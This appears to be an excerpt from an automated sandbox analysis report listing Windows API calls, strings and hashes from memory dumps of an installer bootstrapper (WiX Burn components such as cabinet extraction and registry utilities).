                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 4040495316-1178289305
                                                                                                                                                                    • Opcode ID: 22847037515cd724972d6e5daadd69bd03ed61203edf946f855d8beaf5f17748
                                                                                                                                                                    • Instruction ID: 3f39fcc4ee0e5ebb94692f3e51a137bea9c9255aa970a51ec31b0da87f8a75ff
                                                                                                                                                                    • Opcode Fuzzy Hash: 22847037515cd724972d6e5daadd69bd03ed61203edf946f855d8beaf5f17748
                                                                                                                                                                    • Instruction Fuzzy Hash: 5521C672E40229EBD7219B95CC05F9EBBB8EF10710F21816AED55EB291D3708E00DBD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00CA0CC4
                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA0CD6
                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA0CE9
                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00CA08B1,?,?), ref: 00CA0CF8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid operation for this state., xrefs: 00CA0C9D
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0C93
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                    • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 609741386-1751360545
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00CC3574
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00CEB6C8), ref: 00CC3591
                                                                                                                                                                    • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00CEB6B8,?,?,?,?,?,?), ref: 00CC35AC
                                                                                                                                                                    • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00CEB6B8,?,?,?,?,?,?), ref: 00CC35B8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                    • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                    • API String ID: 2109125048-2356320334
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4A9D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4ACA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00CC4AF6
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00CCB7A0,?,00000000,?,00000000,?,00000000), ref: 00CC4B34
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CC4B65
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1145190524-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 00C9E985
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00C9E994
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00C9E9A8
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00C9E9B8
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00C9E9D2
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00C9EA31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3812958022-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA0B27
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 00CA0B31
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move file pointer 0x%x bytes., xrefs: 00CA0B62
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0B55
                                                                                                                                                                    • Invalid seek type., xrefs: 00CA0ABD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-417918914
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?), ref: 00C84123
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000,00000000), ref: 00C84131
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,840F01E8,00C85489,?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000), ref: 00C8419A
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000,00000000), ref: 00C841A4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                    • String ID: dirutil.cpp
                                                                                                                                                                    • API String ID: 1375471231-2193988115
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CC0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00C93FB5,feclient.dll,?,00000000,?,?,?,00C84B12), ref: 00C93B42
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CC112B
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC1163
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                                    • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                    • API String ID: 1586453840-3596319545
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenA.KERNEL32(00CA12CF,00000000,00000000,?,?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.), ref: 00CC0776
                                                                                                                                                                    • WriteFile.KERNELBASE(00000208,00000000,00000000,?,00000000,?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F), ref: 00CC07B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00CC0013,00CA12CF,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CC07BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 606256338-3545173039
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CA140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00CA0A19,?,?,?), ref: 00CA1434
                                                                                                                                                                      • Part of subcall function 00CA140C: GetLastError.KERNEL32(?,00CA0A19,?,?,?), ref: 00CA143E
                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00CA0A27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00CA0A31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0A55
                                                                                                                                                                    • Failed to read during cabinet extraction., xrefs: 00CA0A5F
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                    • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2170121939-2426083571
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00CA0A19,?,?,?), ref: 00CA1434
                                                                                                                                                                    • GetLastError.KERNEL32(?,00CA0A19,?,?,?), ref: 00CA143E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move to virtual file pointer., xrefs: 00CA146C
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA1462
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-3005670968
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(00CCB478,00000000,?,00CA1717,?,00000000,?,00C8C287,?,00C85405,?,00C975A5,?,?,00C85405,?), ref: 00CA07BF
                                                                                                                                                                    • GetLastError.KERNEL32(?,00CA1717,?,00000000,?,00C8C287,?,00C85405,?,00C975A5,?,?,00C85405,?,00C85445,00000001), ref: 00CA07C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA07ED
                                                                                                                                                                    • Failed to set begin operation event., xrefs: 00CA07F7
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorEventLast
                                                                                                                                                                    • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3848097054-4159625223
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00C81104,?,?,00000000), ref: 00C85142
                                                                                                                                                                    • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00C81104,?,?,00000000), ref: 00C85172
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareStringlstrlen
                                                                                                                                                                    • String ID: burn.clean.room
                                                                                                                                                                    • API String ID: 1433953587-3055529264
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83877
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C83881
                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00C838EA
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1230559179-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8), ref: 00C83A20
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8,000001C7,00000100), ref: 00C83A27
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C83BB6,00000000,?,00C81474,00000000,80004005,00000000,80004005,00000000,000001C7,?,00C813B8,000001C7,00000100,?), ref: 00C83A31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 406640338-0
                                                                                                                                                                    • Opcode ID: 0f2f7c70e769b88b3a768cf6a69c3b4ecc32c18480bd453712d3dcc9a4901e1a
                                                                                                                                                                    • Instruction ID: 07a5b54f31805c39be8941b0191e4dca13344a4d8ca27ec1c2736779ce4c742b
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f2f7c70e769b88b3a768cf6a69c3b4ecc32c18480bd453712d3dcc9a4901e1a
                                                                                                                                                                    • Instruction Fuzzy Hash: 30D01273A0413957872127E69D5DF9F7F5CEF04AA2B050121FD54D7220D725CD0097E8
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CC0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00C97D59,?,?,?), ref: 00C8F7B9
                                                                                                                                                                      • Part of subcall function 00CC1026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00C8F78E,00000000,Installed,00000000,?), ref: 00CC104B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: Installed
                                                                                                                                                                    • API String ID: 3677997916-3662710971
                                                                                                                                                                    • Opcode ID: 2b2693e890370e2e377edc24a06be4230e323e128c584e15df2ecaa95489e82c
                                                                                                                                                                    • Instruction ID: 16d1941571fc0bb4487dfe9afba80ccaca44166db333954cfd5971b1440a5a6c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b2693e890370e2e377edc24a06be4230e323e128c584e15df2ecaa95489e82c
                                                                                                                                                                    • Instruction Fuzzy Hash: FF014F36920118FBDB11EB94C846FDEBBB8EF04715F1141A9E900A7111D7759E909794
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 71445658-955085611
                                                                                                                                                                    • Opcode ID: 7c16486e3f8c93c4981705c0a31e29181319835c694e58fb6c9e3e58df6fab87
                                                                                                                                                                    • Instruction ID: 7a29316bd6f87c67ee272e8eea56c65065447f3972b4cd6044a63ada63d81f9c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c16486e3f8c93c4981705c0a31e29181319835c694e58fb6c9e3e58df6fab87
                                                                                                                                                                    • Instruction Fuzzy Hash: 20F0F633601176E69F3015D6CC05F6BAA49DB947B0F35412DFD569E250E6618C8096F0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: b977e3792e466da2b541395033d6b92c0c175a937b2915e1ff782768987ce1ae
                                                                                                                                                                    • Instruction ID: 6f80033119a443aea2b06aee8e49ec957b83b1553e6deac569e2140fdcbd3b3f
                                                                                                                                                                    • Opcode Fuzzy Hash: b977e3792e466da2b541395033d6b92c0c175a937b2915e1ff782768987ce1ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 41B012E12694826D374851175E07D37110CC1C5F22730417EF108C1141E8501C061032
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 4bf7defb46aa8acad47ab9bde3c5d05a9e479185b456e15b15248ef1e3d7618a
                                                                                                                                                                    • Instruction ID: c8c8fe1bce615e275e649f7deb76723596a3bd7bd6ee7bbc0acd94990531a6f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf7defb46aa8acad47ab9bde3c5d05a9e479185b456e15b15248ef1e3d7618a
                                                                                                                                                                    • Instruction Fuzzy Hash: 55B012E12695826C374851175D06D37110CC1C5F22730827EF108C1141E8601C451032
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CBF491
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID: PA9n
                                                                                                                                                                    • API String ID: 1269201914-1067447980
                                                                                                                                                                    • Opcode ID: 536793f70b4070aea36a7c871a523429f8ee9834e60e73a5ec55fd4f64e838ba
                                                                                                                                                                    • Instruction ID: 7598d4d0f42f9eba91ac0f58513b3b7744b3c4f8dc1846f5169b5239b6a9a7ef
                                                                                                                                                                    • Opcode Fuzzy Hash: 536793f70b4070aea36a7c871a523429f8ee9834e60e73a5ec55fd4f64e838ba
                                                                                                                                                                    • Instruction Fuzzy Hash: 19B012E52694827C370811135D06C37110CC1C1F22730C27EF504C0041A8501C051032
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,?,00C8226D,?,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000), ref: 00C83B04
                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,00C8226D,?,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83B0B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83960
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83967
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00CC35F8
                                                                                                                                                                      • Part of subcall function 00CC304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00CC3609,00000000,?,00000000), ref: 00CC3069
                                                                                                                                                                      • Part of subcall function 00CC304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CAC025,?,00C85405,?,00000000,?), ref: 00CC3075
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
